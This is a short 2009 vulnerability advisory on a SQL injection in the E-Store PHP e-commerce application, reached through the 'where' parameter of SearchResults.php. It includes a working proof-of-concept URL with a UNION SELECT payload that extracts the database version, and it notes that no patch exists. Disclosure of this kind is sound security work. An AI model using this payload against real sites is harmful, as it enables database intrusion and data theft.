1 E−Store SQL Injection Vulnerability
2
3 Name E−Store
4 Vendor http://www.getaphpsite.com
5
6 Author Salvatore Fresta aka Drosophila
7 Website http://www.salvatorefresta.net
8 Contact salvatorefresta [at] gmail [dot] com
9 Date 2009−09−03
10
11 X. INDEX
12
13 I. ABOUT THE APPLICATION
14 II. DESCRIPTION
15 III. ANALYSIS
16 IV. SAMPLE CODE
17 V. FIX
18 VI. DISCLOSURE TIMELINE
19
20
21 I. ABOUT THE APPLICATION
22
23 E−Store is a commercial PHP e−commerce.
24
25
26 II. DESCRIPTION
27
28 This application presents a SQL Injection bug.
29
30
31 III. ANALYSIS
32
33 Summary:
34
35 A) SQL Injection
36
37 A) SQL Injection
38
39 The GET where parameter passed to SearchResults.php has not
40 properly sanitised. Because of the affected query, the Magic
41 Quotes GPC flag (php.in) may be on.
42
43
44 IV. SAMPLE CODE
45
46 http://site/path/SearchResults.php?SearchTerm=&where=ItemName UNION
47 ALL SELECT 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23&ord1=ItemName&ord2=asc&search1=Go!
48
49
50 V. FIX
51
52 No patch.
Page 1/1
EStore SQL Injection Vulnerability
Salvatore Fresta
12/11/2009